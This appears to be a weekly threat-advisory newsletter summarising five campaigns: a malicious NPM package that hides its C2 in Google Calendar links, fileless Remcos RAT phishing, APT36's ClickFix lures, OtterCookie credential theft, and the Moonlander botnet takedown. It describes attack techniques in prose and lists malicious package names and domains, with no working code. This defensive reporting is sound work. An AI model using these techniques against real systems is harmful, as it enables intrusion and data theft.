Malicious NPM Package Uses Google Calendar as C2 Channel

In the past week, critical cybersecurity threats have emerged, with significant vulnerabilities being reported across various platforms. Recent cybersecurity incidents include the discovery of a malicious NPM package (os-info-checker-es6) using Unicode steganography and Google Calendar links for covert command-and-control (C2) communication. Despite being reported, the package and four related dependencies remain active, posing an ongoing supply chain risk. In another campaign, attackers are delivering Remcos RAT through fileless PowerShell loaders via tax-themed phishing emails containing malicious LNK files. The infection chain uses mshta.exe and registry persistence to load the malware directly in memory. Meanwhile, Pakistan-linked APT36 has expanded its ClickFix social engineering campaign to target Windows and Linux users through fake Ministry of Defence websites and OS-specific clipboard manipulation. Separately, North Korea’s WaterPlum group (aka Famous Chollima) has upgraded its OtterCookie malware, enhancing credential theft and VM evasion across platforms as part of the Contagious Interview campaign. Lastly, a joint U.S.-Dutch operation (Moonlander) disrupted a $46 million proxy botnet powered by TheMoon malware and thousands of compromised IoT and end-of-life devices, highlighting persistent risks from unpatched infrastructure. These developments underscore the urgent need for organizations to stay vigilant and apply security updates promptly.

SISA Weekly Threat Watch – our weekly feature brings to you a quick snapshot of all the major security vulnerabilities that posed a threat to organizations worldwide. These recurring actionable threat advisories will also provide information and recommendations that will help security teams take appropriate actions to defend against the latest and critical threats.

1. Supply Chain Attack: Malicious NPM Package Uses Google Calendar as C2 Channel

A malicious NPM package named os-info-checker-es6 has been discovered using Unicode steganography and Google Calendar links for advanced command-and-control (C2) communication. Initially benign, the package was modified in May 2024 to deliver obfuscated binaries and scripts through the use of eval(). The malware extracts invisible Unicode characters from strings to reconstruct a Google Calendar short link, which eventually reveals a base64-encoded URL for the second-stage payload. The campaign also involves four related packages including skip-tot, vue-dev-serverr, vue-dummyy, and vue-bit, all posing as utility tools to expand reach. Despite a detailed disclosure by Veracode, the packages remain active on NPM, posing an ongoing risk. Organizations are advised to audit NPM dependencies, remove the affected packages, implement runtime monitoring, and block access to calendar.google.com in build environments. Dependency scanning tools and CI/CD hardening are essential to detect obfuscation techniques and prevent future supply chain compromises.

2. Remcos RAT Campaign Uses Fileless Techniques and AI-Evading Phishing Lures

A new malware campaign is leveraging malicious LNK shortcut files and mshta.exe to deploy the Remcos Remote Access Trojan (RAT) using a fileless, PowerShell-based shellcode loader. Delivered via tax-themed phishing emails, the attack starts with ZIP files containing LNK files disguised as Office documents. When opened, these invoke mshta.exe to execute a remote HTA file (xlab22.hta), which runs obfuscated VBScript to download a PowerShell script. This script fetches a decoy PDF, a second HTA file (311.hta), and modifies the Windows Registry for persistence. The PowerShell code executes entirely in memory, evading traditional defenses while loading Remcos RAT, a tool capable of keylogging, clipboard monitoring, remote access, and data exfiltration to domains like readysteaurants[.]com. Security firm Qualys linked the activity to domains and IPs associated with recent campaigns. Organizations are urged to block LNK/HTA files, monitor PowerShell and mshta.exe usage, and implement script-blocking and behavioral EDR controls to detect in-memory threats.

3. APT36 Expands ClickFix Campaign Targeting Windows and Linux 

A new cross-platform ClickFix campaign has been identified, targeting Windows, Linux, and previously macOS systems through clipboard manipulation and run dialog execution. Originating from APT36 (Transparent Tribe), a Pakistan-linked group, the campaign uses fake Ministry of Defence websites to trick users into copying and executing system-specific commands. On Windows, users are shown a fake warning that leads to MSHTA-based malware execution, while Linux users are redirected through a CAPTCHA that copies a shell command to the clipboard. The command downloads a benign image, suggesting the Linux payload is in a testing phase, though the infrastructure is ready for malicious use. macOS users were previously targeted via fake Google Meet errors, confirming ClickFix’s OS-agnostic nature. The tactic blends social engineering, JavaScript clipboard control, and OS fingerprinting. Organizations should educate users, restrict run dialogs, and monitor clipboard activity. Blocking MSHTA, PowerShell, and malicious domains like trade4wealth[.]in is strongly advised to mitigate risks.

4. WaterPlum Upgrades OtterCookie Malware in Contagious Interview Campaign

North Korean threat group WaterPlum (aka Famous Chollima, linked to Lazarus Group) has upgraded its OtterCookie malware to versions v3 and v4 as part of the Contagious Interview campaign, enhancing data theft and virtual machine evasion. OtterCookie now includes modules for stealing browser credentials, crypto wallet data, mnemonic phrases, and iCloud Keychain content. Version 4 adds detection of VMware, VirtualBox, QEMU, and other sandbox environments. The malware is distributed via malicious npm packages, trojanized repositories, and fake macOS apps. A new payload, Tsunami-Framework, a modular .NET-based malware, has also surfaced with capabilities for keystroke logging, browser data theft, and botnet activity. The campaign also involves fraudulent IT job seekers using deepfake resumes, fake LinkedIn profiles, and long-duration Zoom calls to infiltrate organizations. Targets include global firms and government contractors. Organizations should block associated infrastructure, verify candidate identities, and monitor for suspicious access and credential theft activity.

5. Operation Moonlander Disrupts Massive Botnet Exploiting IoT and End-of-Life Devices

A joint operation by U.S. and Dutch authorities has dismantled a large-scale criminal proxy botnet powered by malware-infected IoT and end-of-life (EoL) devices, generating over $46 million in illicit revenue. Four individuals from Russia and Kazakhstan were charged for running 5socks.net and anyproxy.net, services that sold unauthorized residential proxy access to cybercriminals. The operation, dubbed Moonlander, disrupted infrastructure leveraging TheMoon malware, which exploited unpatched routers to maintain persistent remote access and spread silently. TheMoon, active since 2014, primarily targeted Linksys routers via remote script injection, using C2 servers in Turkey to coordinate infections. Over 7,000 proxies were advertised daily, enabling anonymization, ad fraud, DDoS attacks, and other malicious activity. Despite the takedown, EoL device risks persist, particularly in the U.S., Canada, and Ecuador where most bots were located. Organizations are urged to replace outdated routers, apply firmware updates, restrict port access, and monitor network traffic for unusual behavior.